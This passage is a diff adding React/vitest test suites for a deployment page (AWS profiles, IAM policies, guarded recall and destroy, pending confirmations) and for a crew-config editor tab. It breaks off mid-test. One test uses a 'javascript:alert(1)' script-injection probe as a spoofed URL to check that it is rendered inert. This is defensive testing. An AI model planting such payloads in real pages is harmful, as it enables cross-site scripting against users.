+    fireEvent.change(screen.getByLabelText(/^Account \(12 digits/), { target: { value: '210987654321' } })
+    fireEvent.change(screen.getByLabelText('Role (optional)'), { target: { value: 'DeployRole' } })
+
+    fireEvent.click(screen.getByRole('button', { name: 'Create + register' }))
+    expect(await screen.findByText("Created + registered profile 'fresh-sandbox'.")).toBeInTheDocument()
+    expect(writes(calls, '/profiles')[0].body).toEqual({
+      name: 'fresh-sandbox', region: 'eu-central-1', create: true, account: '210987654321', role: 'DeployRole',
+    })
+    expect(screen.queryByLabelText('Profile name')).toBeNull()
+  })
+
+  it('defaults a blank region to us-west-2 and refuses a nameless profile', async () => {
+    const calls = installFetch()
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByRole('button', { name: /New profile/ }))
+    expect(screen.getByRole('button', { name: 'Register' })).toBeDisabled()
+
+    fireEvent.change(screen.getByLabelText('Profile name'), { target: { value: 'no-region' } })
+    fireEvent.change(screen.getByLabelText('Region'), { target: { value: '   ' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Register' }))
+    await waitFor(() => expect(writes(calls, '/profiles')).toHaveLength(1))
+    expect(writes(calls, '/profiles')[0].body).toMatchObject({ name: 'no-region', region: 'us-west-2', create: false })
+  })
+
+  it('promotes a profile to default with a PUT, and ignores a click on the current default', async () => {
+    const calls = installFetch()
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByLabelText('ship-prod is the default profile'))
+    expect(writes(calls, '/profiles')).toHaveLength(0)
+
+    fireEvent.click(screen.getByLabelText('Make ship-sandbox the default profile'))
+    await waitFor(() => expect(writes(calls, '/profiles')).toHaveLength(1))
+    const [put] = writes(calls, '/profiles')
+    expect(put.method).toBe('PUT')
+    expect(put.url).toBe('/api/deploy/profiles/ship-sandbox')
+    expect(put.body).toEqual({ default: true })
+  })
+
+  it('reports a rejected default change instead of silently keeping the old one', async () => {
+    installFetch({ write: { status: 409, body: {} } })
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByLabelText('Make ship-sandbox the default profile'))
+    expect(await screen.findByText('Error: update failed')).toBeInTheDocument()
+  })
+
+  it('removes a profile from the registry after confirmation, saying the AWS config is untouched', async () => {
+    const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
+    const calls = installFetch()
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByLabelText('Remove ship-sandbox from registry'))
+    expect(confirmSpy).toHaveBeenCalledWith(expect.stringContaining("Remove 'ship-sandbox' from the registry?"))
+    expect(await screen.findByText('Removed from registry (your ~/.aws/config is untouched).')).toBeInTheDocument()
+    expect(writes(calls, '/profiles')[0].method).toBe('DELETE')
+  })
+
+  it('sends nothing when the removal confirm is declined', async () => {
+    vi.spyOn(window, 'confirm').mockReturnValue(false)
+    const calls = installFetch()
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByLabelText('Remove ship-sandbox from registry'))
+    expect(writes(calls, '/profiles')).toHaveLength(0)
+  })
+
+  it('reports a failed removal', async () => {
+    vi.spyOn(window, 'confirm').mockReturnValue(true)
+    installFetch({ write: { status: 500, body: {} } })
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByLabelText('Remove ship-sandbox from registry'))
+    expect(await screen.findByText('Error: remove failed')).toBeInTheDocument()
+  })
+
+  it('shows the account behind a verified profile', async () => {
+    const calls = installFetch()
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getAllByRole('button', { name: /Verify/ })[0])
+    // Built from the mock rather than inlined: the literal "account <12
+    // digits>" string is the shape scripts/scrub-lint.sh rejects.
+    const account = (PROFILES[0] as { account: string }).account
+    expect(
+      await screen.findByText(new RegExp(`access reachable \\(account ${account}\\)`)),
+    ).toBeInTheDocument()
+    expect(screen.getByText('sts + s3 + cloudfront reachable')).toBeInTheDocument()
+    expect(writes(calls, '/verify')[0].body).toEqual({ profile: 'ship-prod' })
+  })
+
+  it('shows the failure detail when a profile is not reachable', async () => {
+    installFetch({ verify: { reachable: false, detail: 'ExpiredToken: sso session expired', note: 'run aws sso login' } })
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getAllByRole('button', { name: /Verify/ })[0])
+    expect(await screen.findByText('ExpiredToken: sso session expired')).toBeInTheDocument()
+  })
+
+  it('falls back to a plain not-reachable message when neither detail nor error is given', async () => {
+    installFetch({ verify: { reachable: false, note: '' } })
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getAllByRole('button', { name: /Verify/ })[0])
+    expect(await screen.findByText('not reachable')).toBeInTheDocument()
+  })
+})
+
+describe('ArtifactDeployPage — IAM policy loader', () => {
+  beforeEach(() => vi.unstubAllGlobals())
+  afterEach(() => vi.restoreAllMocks())
+
+  it('loads the static-tier policy and copies it, with no boundary block', async () => {
+    const writeText = installClipboard()
+    const calls = installFetch()
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByRole('button', { name: 'Get IAM policy' }))
+    expect(await screen.findByText('STATIC-POLICY-JSON')).toBeInTheDocument()
+    expect(calls.some((c) => c.url.includes('/iam-policy?tier=static'))).toBe(true)
+    expect(screen.queryByRole('button', { name: /Copy boundary policy/ })).toBeNull()
+    fireEvent.click(screen.getByRole('button', { name: /Copy policy/ }))
+    expect(writeText).toHaveBeenCalledWith('STATIC-POLICY-JSON')
+  })
+
+  it('loads the fullstack tier with its permissions-boundary policy and note', async () => {
+    const writeText = installClipboard()
+    const calls = installFetch({
+      policy: {
+        policy: 'FULLSTACK-POLICY-JSON',
+        boundary_policy: 'BOUNDARY-POLICY-JSON',
+        boundary_policy_name: 'deploy-app-boundary',
+        boundary_note: 'Create this boundary before the first deploy',
+      },
+    })
+    renderPage()
+    await profilesLoaded()
+
+    fireEvent.click(screen.getByRole('combobox', { name: 'Policy tier' }))
+    fireEvent.click(await screen.findByRole('option', { name: 'fullstack' }))
+    fireEvent.click(screen.getByRole('button', { name: 'Get IAM policy' }))
+
+    expect(await screen.findByText('FULLSTACK-POLICY-JSON')).toBeInTheDocument()
+    expect(calls.some((c) => c.url.includes('/iam-policy?tier=fullstack'))).toBe(true)
+    expect(screen.getByText(/Fullstack tier: includes Lambda/)).toBeInTheDocument()
+    expect(screen.getByText('Create this boundary before the first deploy (name: deploy-app-boundary)')).toBeInTheDocument()
+    fireEvent.click(screen.getByRole('button', { name: /Copy boundary policy/ }))
+    expect(writeText).toHaveBeenCalledWith('BOUNDARY-POLICY-JSON')
+  })
+
+  it('explains the boundary requirement itself when the backend sends no note', async () => {
+    installFetch({ policy: { policy: 'FULLSTACK-POLICY-JSON', boundary_policy: 'BOUNDARY-POLICY-JSON' } })
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByRole('button', { name: 'Get IAM policy' }))
+    expect(await screen.findByText('BOUNDARY-POLICY-JSON')).toBeInTheDocument()
+    expect(screen.getByText(/Fullstack also requires the permissions-boundary policy below/)).toBeInTheDocument()
+  })
+})
+
+describe('ArtifactDeployPage — recall and destroy two-call guard', () => {
+  beforeEach(() => vi.unstubAllGlobals())
+  afterEach(() => vi.restoreAllMocks())
+
+  it('binds a confirmed recall to the resources the preview call resolved', async () => {
+    const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
+    const calls = installFetch({ sites: [SITE] })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Recall/ }))
+
+    await waitFor(() => expect(writes(calls, '/recall')).toHaveLength(2))
+    expect(confirmSpy).toHaveBeenCalledWith(expect.stringContaining('bkt-9f3'))
+    const [preview, commit] = writes(calls, '/recall')
+    expect(preview.body).toEqual({ site_id: 'blog', profile: 'ship-prod' })
+    expect(commit.body).toEqual({
+      site_id: 'blog', confirm: true, profile: 'ship-prod',
+      expected_bucket: 'bkt-9f3', expected_distribution_id: 'E1DIST',
+    })
+    expect(await screen.findByText("Recalled 'blog'.")).toBeInTheDocument()
+  })
+
+  it('sends no confirmed recall when the dialog is declined', async () => {
+    vi.spyOn(window, 'confirm').mockReturnValue(false)
+    const calls = installFetch({ sites: [SITE] })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Recall/ }))
+    await waitFor(() => expect(writes(calls, '/recall')).toHaveLength(1))
+    expect(screen.queryByText(/Recalled/)).toBeNull()
+  })
+
+  it('never reaches the dialog when the recall preview itself fails', async () => {
+    const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
+    const calls = installFetch({ sites: [SITE], preview: { status: 500, body: { error: 'no such site' } } })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Recall/ }))
+    await waitFor(() => expect(writes(calls, '/recall')).toHaveLength(1))
+    expect(confirmSpy).not.toHaveBeenCalled()
+    expect(screen.queryByText(/Recalled/)).toBeNull()
+  })
+
+  it('reports a recall the backend refused after confirmation', async () => {
+    vi.spyOn(window, 'confirm').mockReturnValue(true)
+    installFetch({ sites: [SITE], commit: { status: 409, body: { error: 'bucket changed since preview' } } })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Recall/ }))
+    expect(await screen.findByText('Error: bucket changed since preview')).toBeInTheDocument()
+  })
+
+  it('names the bucket and the distribution in the destroy dialog and binds both', async () => {
+    const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
+    const calls = installFetch({ sites: [SITE] })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Destroy/ }))
+
+    await waitFor(() => expect(writes(calls, '/destroy')).toHaveLength(2))
+    expect(confirmSpy).toHaveBeenCalledWith(expect.stringContaining('distribution E1DIST'))
+    expect(writes(calls, '/destroy')[1].body).toMatchObject({
+      confirm: true, expected_bucket: 'bkt-9f3', expected_distribution_id: 'E1DIST',
+    })
+    expect(await screen.findByText(/Destroying 'blog'/)).toBeInTheDocument()
+  })
+
+  it('marks unknown resources with a question mark rather than an empty dialog', async () => {
+    const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(false)
+    installFetch({ sites: [SITE], preview: { status: 200, body: {} } })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Destroy/ }))
+    await waitFor(() => expect(confirmSpy).toHaveBeenCalledWith(expect.stringMatching(/bucket \? and distribution \?/)))
+  })
+
+  it('reports a destroy that the backend refused after confirmation', async () => {
+    vi.spyOn(window, 'confirm').mockReturnValue(true)
+    installFetch({ sites: [SITE], commit: { status: 409, body: { error: 'site was recreated since preview' } } })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Destroy/ }))
+    expect(await screen.findByText('Error: site was recreated since preview')).toBeInTheDocument()
+  })
+
+  it('fails the destroy closed when the preview cannot resolve the resources', async () => {
+    const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
+    const calls = installFetch({ sites: [SITE], preview: { status: 503, body: {} } })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    fireEvent.click(screen.getByRole('button', { name: /Destroy/ }))
+    // No dialog, no confirmed call: a destroy whose target could not be
+    // resolved must not proceed unbound.
+    await waitFor(() => expect(writes(calls, '/destroy')).toHaveLength(1))
+    expect(confirmSpy).not.toHaveBeenCalled()
+    expect(screen.queryByText(/Destroying/)).toBeNull()
+  })
+})
+
+describe('ArtifactDeployPage — deployment rows', () => {
+  beforeEach(() => vi.unstubAllGlobals())
+  afterEach(() => vi.restoreAllMocks())
+
+  it('renders a non-http deployment URL as inert text, never as a link', async () => {
+    installFetch({
+      sites: [
+        { site_id: 'spoofed', bucket: 'b', distribution_id: 'd', status: 'error', url: 'javascript:alert(1)', profile: '' },
+        { site_id: 'stateless', bucket: 'b', distribution_id: 'd' },
+      ],
+    })
+    renderPage()
+    await screen.findByText(/Deployments \(2\)/)
+    const unsafe = screen.getByText('javascript:alert(1)')
+    expect(unsafe.closest('a')).toBeNull()
+    // A site the backend has not classified yet reads as unknown, not as live.
+    expect(screen.getByText('unknown')).toBeInTheDocument()
+    expect(screen.getByText('error')).toBeInTheDocument()
+    expect(screen.getAllByText('—').length).toBeGreaterThanOrEqual(2)
+  })
+
+  it('omits the profile clause from the deploy handoff when nothing is registered', async () => {
+    installFetch({ profiles: [], defaultProfile: '', webapps: [webapp('kanban-draft')] })
+    renderPage()
+    await screen.findByText(/Ready to deploy \(1\)/)
+    // With no registered profile there is nothing to pick from, so no selector.
+    expect(screen.queryByRole('combobox', { name: /Deploy profile/ })).toBeNull()
+    fireEvent.click(screen.getByLabelText('Deploy kanban-draft'))
+    const launch = (window as unknown as { __mc_chat_launch?: { message: string } }).__mc_chat_launch
+    expect(launch?.message).toContain('kanban-draft')
+    expect(launch?.message).not.toContain('Use the AWS profile')
+    expect(screen.getByText('route: /chat')).toBeInTheDocument()
+  })
+
+  it('reads a costless draft as ~$0.00 and hides an expired one', async () => {
+    installFetch({
+      webapps: [
+        webapp('free-draft', { estimates: [] }),
+        webapp('gone-draft', { status: 'expired' }),
+      ],
+    })
+    renderPage()
+    await screen.findByText(/Ready to deploy \(1\)/)
+    expect(screen.getByText('free-draft')).toBeInTheDocument()
+    expect(screen.queryByText('gone-draft')).toBeNull()
+    expect(screen.getByText('~$0.00')).toBeInTheDocument()
+  })
+})
+
+describe('ArtifactDeployPage — pending confirmations', () => {
+  beforeEach(() => vi.unstubAllGlobals())
+  afterEach(() => vi.restoreAllMocks())
+
+  it('stays hidden while nothing awaits a human', async () => {
+    installFetch()
+    renderPage()
+    await profilesLoaded()
+    expect(screen.queryByText(/Pending confirmations/)).toBeNull()
+  })
+
+  it('lists each waiting deploy with its source, profile, TTL, scan and age', async () => {
+    installFetch({
+      pending: [
+        pendingEntry(),
+        pendingEntry({
+          id: 'p2', site_id: 'notes-preview', artifact_slug: '', local_dir: '', profile: '',
+          ttl_hours: 6, scan_summary: '2 findings', override_scan_required: true,
+          created_at_epoch: Math.floor(Date.now() / 1000) - 120,
+        }),
+      ],
+    })
+    renderPage()
+    expect(await screen.findByText(/Pending confirmations \(2\)/)).toBeInTheDocument()
+    expect(screen.getByText(/Source: kanban · Profile: ship-prod · TTL: 24h · Scan: clean · 10m ago/)).toBeInTheDocument()
+    // Neither an artifact nor a local directory: the source is unknown, not blank.
+    expect(screen.getByText(/Source: \(unknown\) · Profile: default · TTL: 6h/)).toBeInTheDocument()
+    expect(screen.getByText(/Blocked by non-credential scan findings/)).toBeInTheDocument()
+    expect(screen.getByRole('button', { name: 'Confirm Deploy' })).toBeInTheDocument()
+    expect(screen.getByRole('button', { name: 'Deploy anyway' })).toBeInTheDocument()
+  })
+
+  it('sends override_scan only for the entry the scan blocked', async () => {
+    const calls = installFetch({
+      pending: [
+        pendingEntry(),
+        pendingEntry({ id: 'p2', site_id: 'notes-preview', override_scan_required: true }),
+      ],
+    })
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: 'Deploy anyway' }))
+    await waitFor(() => expect(writes(calls, '/pending/p2/confirm')).toHaveLength(1))
+    expect(writes(calls, '/pending/p2/confirm')[0].body).toEqual({ override_scan: true })
+
+    fireEvent.click(screen.getByRole('button', { name: 'Confirm Deploy' }))
+    await waitFor(() => expect(writes(calls, '/pending/p1/confirm')).toHaveLength(1))
+    expect(writes(calls, '/pending/p1/confirm')[0].body).toEqual({})
+  })
+
+  it('shows the backend reason a confirmed deploy was rejected', async () => {
+    installFetch({ pending: [pendingEntry()], confirmPending: { status: 400, body: { error: 'credential finding still present' } } })
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: 'Confirm Deploy' }))
+    expect(await screen.findByText('credential finding still present')).toBeInTheDocument()
+  })
+
+  it('dismisses a waiting deploy', async () => {
+    const calls = installFetch({ pending: [pendingEntry()] })
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: 'Dismiss' }))
+    await waitFor(() => expect(writes(calls, '/pending/p1/dismiss')).toHaveLength(1))
+    expect(writes(calls, '/pending/p1/dismiss')[0].method).toBe('POST')
+  })
+
+  it('reports a failed dismiss with the status when the body carries no reason', async () => {
+    installFetch({ pending: [pendingEntry()], dismissPending: { status: 500, body: {} } })
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: 'Dismiss' }))
+    expect(await screen.findByText('Dismiss failed (500)')).toBeInTheDocument()
+  })
+})

--- a/website/src/test/CfgTabCoverage.test.tsx
+++ b/website/src/test/CfgTabCoverage.test.tsx
@@ -1,0 +1,551 @@
+/**
+ * KiroCrewCfgTab — the Kiro Crew config table on the developer page.
+ *
+ * The file sat at ~3% before this suite: only its module-level constants ran.
+ * Everything below aims at the cold paths — the query error/loading boundaries,
+ * the three tables' per-cell fallbacks, and the three editor primitives
+ * (CfgNumber / CfgSelect / CfgToggle) whose validation, dirty-tick and patch
+ * plumbing had no coverage at all.
+ */
+import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { screen, waitFor, fireEvent, within, act } from '@testing-library/react'
+import KiroCrewCfgTab from '../pages/overview/KiroCrewCfgTab'
+import { renderWithProviders } from './helpers'
+import { api } from '../api/client'
+
+vi.mock('../api/client')
+
+/* SimpleSelect is stubbed for the same reason as CrewEditorSelect.test.tsx and
+   WorkspaceModal.test.tsx: it wraps a Radix Select, which commits its selection
+   inside `ReactDOM.flushSync(...)`, and this tab mounts FIVE of them at once —
+   driving them for real costs an open/close cycle per assertion for a dropdown
+   that is not the code under test. What IS under test is CfgSelect's own
+   `onChange` (markDirty → setLocal → onSave), which the stub reaches directly.
+   Each stub is a role="group" named after its row label so duplicated option
+   values ('auto' belongs to both Approval Mode and Sandbox) stay unambiguous;
+   the current selection rides on each option's aria-selected, so the stub needs
+   no trigger of its own. */
+vi.mock('../components/SimpleSelect', () => ({
+  default: ({ options, optionLabels, value, onChange, 'aria-label': ariaLabel }: {
+    options: string[]
+    optionLabels?: string[]
+    value: string
+    onChange: (v: string) => void
+    'aria-label'?: string
+  }) => (
+    <div role="group" aria-label={ariaLabel}>
+      {options.map((o, i) => (
+        <button key={o} type="button" role="option" aria-selected={o === value} onClick={() => onChange(o)}>
+          {optionLabels?.[i] ?? o}
+        </button>
+      ))}
+    </div>
+  ),
+}))
+
+type Cfg = Record<string, unknown>
+
+/**
+ * A config with something interesting in every conditional cell: `crew-beta`
+ * carries an empty `kiro_agent` (em-dash fallback), `mem-spare` has neither a
+ * description nor an embedding provider (inherited-provider italic), and
+ * `ws-idle` is bound by nobody (empty Used By). Every name is distinct so a
+ * within(row) query can never collide with a neighbouring cell.
+ */
+const CFG = {
+  agents: {
+    'crew-alpha': { kiro_agent: 'tmpl-alpha', workspace: 'ws-main', memory_store: 'mem-main', description: '', source: 'config' },
+    'crew-beta': { kiro_agent: '', workspace: 'ws-main', memory_store: 'mem-spare', description: '', source: 'config' },
+  },
+  default_agent: 'crew-alpha',
+  workspaces: { 'ws-main': { dir: 'dir-main' }, 'ws-idle': { dir: 'dir-idle' } },
+  default_workspace: 'ws-main',
+  memory_stores: {
+    'mem-main': { description: 'legacy-default store', embedding_provider: 'bge-m3' },
+    'mem-spare': { description: '', embedding_provider: '' },
+  },
+  default_memory_store: 'mem-main',
+  agent: {
+    default_agent: 'crew-alpha',
+    provider: 'kiroacp',
+    model: 'claude-opus',
+    approval_mode: 'auto',
+    sandbox: 'auto',
+    subagent_max_turns: 100,
+    max_subagents: 3,
+    subagent_auto_max: 16,
+    conductor_skill: false,
+    tool_search: true,
+    max_channels: 7,
+    max_channel_agents: 5,
+    enforce_denied_commands: 'all',
+  },
+  session: { timeout_secs: 3600, pool_size: 2, pool_agent: '', pool_ttl_secs: 600 },
+  memory: { embedding_provider: 'inherited-embedder' },
+  auto_update: true,
+}
+
+/** Clone so a per-test tweak never leaks into the shared fixture. */
+const clone = (): typeof CFG => JSON.parse(JSON.stringify(CFG))
+
+function seed(cfg: Cfg = CFG, patched: Cfg = CFG) {
+  const m = vi.mocked(api)
+  m.kirocrewConfig = vi.fn().mockResolvedValue(cfg)
+  m.patchConfig = vi.fn().mockResolvedValue(patched)
+  m.saveKirocrewConfig = vi.fn().mockResolvedValue({ ok: true })
+  // ThemeProvider (installed by renderWithProviders) boots its own query; the
+  // automock would resolve undefined, which React Query rejects out loud.
+  m.themeBoot = vi.fn().mockResolvedValue({})
+  return m
+}
+
+/** Render and wait for the first table to replace the skeleton. */
+async function renderTab() {
+  const view = renderWithProviders(<KiroCrewCfgTab />)
+  expect(await screen.findByText('Kiro Crew Agents')).toBeInTheDocument()
+  return view
+}
+
+/** Agents, Workspaces, Memory Stores — in DOM order. */
+const tables = () => screen.getAllByRole('table')
+
+const num = (label: string) => screen.getByRole('spinbutton', { name: label }) as HTMLInputElement
+
+const optionIn = (groupLabel: string, optionName: string) =>
+  within(screen.getByRole('group', { name: groupLabel })).getByRole('option', { name: optionName })
+
+/**
+ * A config row keyed by its visible label.
+ *
+ * CfgToggle's button carries no accessible name of its own — the label lives in
+ * a sibling span — so the row has to be located by that span and the control
+ * read from inside it. Matching on the span's leading TEXT node (rather than its
+ * textContent) keeps the trailing InfoTip glyph out of the comparison.
+ */
+function rowFor(label: string): HTMLElement {
+  const span = screen.getByText(
+    (_content, el) => el?.tagName === 'SPAN' && el.firstChild?.nodeValue?.trim() === label,
+  )
+  return span.parentElement as HTMLElement
+}
+
+/** The on/off button of a CfgToggle row (the InfoTip button is named differently). */
+const toggleFor = (label: string) =>
+  within(rowFor(label)).getByRole('button', { name: /^(on|off)$/ })
+
+beforeEach(() => {
+  vi.clearAllMocks()
+  seed()
+})
+
+// ── Query boundaries ─────────────────────────────────────────────────────
+describe('KiroCrewCfgTab — query boundaries', () => {
+  it('shows a skeleton until the config resolves', async () => {
+    const m = vi.mocked(api)
+    let release: (v: unknown) => void = () => {}
+    m.kirocrewConfig = vi.fn().mockReturnValue(new Promise((res) => { release = res }))
+
+    const { container } = renderWithProviders(<KiroCrewCfgTab />)
+    expect(container.querySelector('.skeleton')).not.toBeNull()
+    expect(screen.queryByText('Kiro Crew Agents')).toBeNull()
+
+    // Settle it before the test ends so the query never resolves after teardown.
+    await act(async () => { release(CFG) })
+    expect(await screen.findByText('Kiro Crew Agents')).toBeInTheDocument()
+  })
+
+  it('renders an Error rejection by its message', async () => {
+    const m = vi.mocked(api)
+    m.kirocrewConfig = vi.fn().mockRejectedValue(new Error('config file unreadable'))
+
+    renderWithProviders(<KiroCrewCfgTab />)
+    expect(await screen.findByText('config file unreadable')).toBeInTheDocument()
+    expect(screen.queryByText('Config Summary')).toBeNull()
+  })
+
+  it('stringifies a non-Error rejection', async () => {
+    const m = vi.mocked(api)
+    m.kirocrewConfig = vi.fn().mockRejectedValue('gateway offline')
+
+    renderWithProviders(<KiroCrewCfgTab />)
+    expect(await screen.findByText('gateway offline')).toBeInTheDocument()
+  })
+})
+
+// ── The three read-only tables ───────────────────────────────────────────
+describe('KiroCrewCfgTab — tables', () => {
+  it('lists agents, badges the default one, and em-dashes a blank template', async () => {
+    await renderTab()
+    const agents = tables()[0]
+
+    const beta = within(agents).getByText('crew-beta').closest('tr') as HTMLElement
+    expect(within(beta).getByText('—')).toBeInTheDocument()
+    expect(within(beta).getByText('mem-spare')).toBeInTheDocument()
+
+    const alpha = within(agents).getByText('crew-alpha').closest('tr') as HTMLElement
+    expect(within(alpha).getByText('default')).toBeInTheDocument()
+    expect(within(alpha).getByText('tmpl-alpha')).toBeInTheDocument()
+  })
+
+  it('derives Used By per workspace and dashes one nobody binds', async () => {
+    await renderTab()
+    const workspaces = tables()[1]
+
+    const bound = within(workspaces).getByText('dir-main').closest('tr') as HTMLElement
+    // Both agents live in ws-main, so both surface as tags.
+    expect(within(bound).getByText('crew-alpha')).toBeInTheDocument()
+    expect(within(bound).getByText('crew-beta')).toBeInTheDocument()
+    expect(within(bound).getByText('default')).toBeInTheDocument()
+
+    const idle = within(workspaces).getByText('dir-idle').closest('tr') as HTMLElement
+    expect(within(idle).getByText('—')).toBeInTheDocument()
+  })
+
+  it('falls back to the global embedder when a store sets none', async () => {
+    await renderTab()
+    const stores = tables()[2]
+
+    const spare = within(stores).getByText('mem-spare').closest('tr') as HTMLElement
+    expect(within(spare).getByText('inherited (inherited-embedder)')).toBeInTheDocument()
+    expect(within(spare).getByText('—')).toBeInTheDocument()
+    expect(within(spare).getByText('crew-beta')).toBeInTheDocument()
+
+    const main = within(stores).getByText('legacy-default store').closest('tr') as HTMLElement
+    expect(within(main).getByText('bge-m3')).toBeInTheDocument()
+  })
+
+  it('renders empty states when there are no agents and no stores', async () => {
+    const bare = clone()
+    bare.agents = {}
+    bare.memory_stores = {}
+    seed(bare)
+
+    await renderTab()
+    expect(screen.getByText('No agents defined')).toBeInTheDocument()
+    expect(screen.getByText('Using legacy mode — agent.default_agent as agent template')).toBeInTheDocument()
+    expect(screen.getByText('No memory stores')).toBeInTheDocument()
+    expect(screen.getByText('Using global memory settings')).toBeInTheDocument()
+    // Only the workspaces table survives.
+    expect(tables()).toHaveLength(1)
+  })
+
+  it('shows the summary values the tab never lets you edit', async () => {
+    await renderTab()
+    expect(screen.getByText('kiroacp')).toBeInTheDocument()
+    expect(screen.getByText('inherited-embedder')).toBeInTheDocument()
+    expect(screen.getByText('7')).toBeInTheDocument()
+    expect(screen.getByText('5')).toBeInTheDocument()
+  })
+})
+
+// ── CfgNumber validation + commit ────────────────────────────────────────
+describe('KiroCrewCfgTab — numeric rows', () => {
+  it('rejects a non-numeric value without patching', async () => {
+    await renderTab()
+
+    const input = num('Session Timeout')
+    fireEvent.change(input, { target: { value: 'abc' } })
+    fireEvent.blur(input)
+
+    expect(screen.getByText('invalid')).toBeInTheDocument()
+    expect(vi.mocked(api).patchConfig).not.toHaveBeenCalled()
+  })
+
+  it('reports the floor and the ceiling instead of saving', async () => {
+    await renderTab()
+    const input = num('Session Timeout')
+
+    fireEvent.change(input, { target: { value: '10' } })
+    fireEvent.blur(input)
+    expect(screen.getByText('min 60')).toBeInTheDocument()
+
+    fireEvent.change(input, { target: { value: '99999' } })
+    fireEvent.blur(input)
+    expect(screen.getByText('max 86400')).toBeInTheDocument()
+
+    expect(vi.mocked(api).patchConfig).not.toHaveBeenCalled()
+  })
+
+  it('patches on blur and confirms with a tick once the new value lands', async () => {
+    const updated = clone()
+    updated.session.timeout_secs = 7200
+    seed(CFG, updated)
+
+    const { container } = await renderTab()
+    const input = num('Session Timeout')
+    fireEvent.change(input, { target: { value: '7200' } })
+    fireEvent.blur(input)
+
+    await waitFor(() => {
+      expect(vi.mocked(api).patchConfig).toHaveBeenCalledWith('session.timeout_secs', 7200)
+    })
+    // useDirtyTrack flips `ok` once the prop echoes the save back.
+    await waitFor(() => expect(container.querySelector('.text-ok')).not.toBeNull())
+  })
+
+  it('commits on Enter as well as blur', async () => {
+    const updated = clone()
+    updated.session.pool_ttl_secs = 900
+    seed(CFG, updated)
+
+    await renderTab()
+    const input = num('Pool TTL')
+    fireEvent.change(input, { target: { value: '900' } })
+
+    // Any other key is a keystroke mid-edit, not a commit.
+    fireEvent.keyDown(input, { key: 'ArrowUp' })
+    expect(vi.mocked(api).patchConfig).not.toHaveBeenCalled()
+
+    fireEvent.keyDown(input, { key: 'Enter' })
+    await waitFor(() => {
+      expect(vi.mocked(api).patchConfig).toHaveBeenCalledWith('session.pool_ttl_secs', 900)
+    })
+  })
+
+  it('does not patch when the committed value equals the current one', async () => {
+    await renderTab()
+    const input = num('Pool Size')
+    fireEvent.change(input, { target: { value: '2' } })
+    fireEvent.blur(input)
+
+    expect(vi.mocked(api).patchConfig).not.toHaveBeenCalled()
+    expect(screen.queryByText('invalid')).toBeNull()
+  })
+})
+
+// ── CfgSelect + CfgToggle ────────────────────────────────────────────────
+describe('KiroCrewCfgTab — select and toggle rows', () => {
+  it('patches the selected option for the row that owns it', async () => {
+    const updated = clone()
+    updated.agent.sandbox = 'off'
+    seed(CFG, updated)
+
+    await renderTab()
+    fireEvent.click(optionIn('Sandbox', 'off'))
+
+    await waitFor(() => {
+      expect(vi.mocked(api).patchConfig).toHaveBeenCalledWith('agent.sandbox', 'off')
+    })
+  })
+
+  it('keeps same-valued options on different rows apart', async () => {
+    const updated = clone()
+    updated.agent.approval_mode = 'interactive'
+    seed(CFG, updated)
+
+    await renderTab()
+    expect(optionIn('Approval Mode', 'auto')).toHaveAttribute('aria-selected', 'true')
+    fireEvent.click(optionIn('Approval Mode', 'interactive'))
+
+    await waitFor(() => {
+      expect(vi.mocked(api).patchConfig).toHaveBeenCalledWith('agent.approval_mode', 'interactive')
+    })
+  })
+
+  it('labels the empty pool agent with the configured default', async () => {
+    await renderTab()
+    expect(optionIn('Pool Agent', '(crew-alpha)')).toBeInTheDocument()
+
+    fireEvent.click(optionIn('Pool Agent', 'crew-beta'))
+    await waitFor(() => {
+      expect(vi.mocked(api).patchConfig).toHaveBeenCalledWith('session.pool_agent', 'crew-beta')
+    })
+  })
+
+  it('flips a boolean row and patches the negated value', async () => {
+    const updated = clone()
+    updated.auto_update = false
+    seed(CFG, updated)
+
+    await renderTab()
+    const toggle = toggleFor('Auto Update')
+    expect(toggle).toHaveTextContent('on')
+
+    fireEvent.click(toggle)
+    expect(toggle).toHaveTextContent('off')
+    await waitFor(() => {
+      expect(vi.mocked(api).patchConfig).toHaveBeenCalledWith('auto_update', false)
+    })
+  })
+
+  it('surfaces a failed patch in both cards that host the save banner', async () => {
+    const m = vi.mocked(api)
+    m.patchConfig = vi.fn().mockRejectedValue(new Error('read-only config'))
+
+    await renderTab()
+    fireEvent.click(toggleFor('MCP Tool Search'))
+
+    // The banner is rendered once in Warm Pool and once in Config Summary.
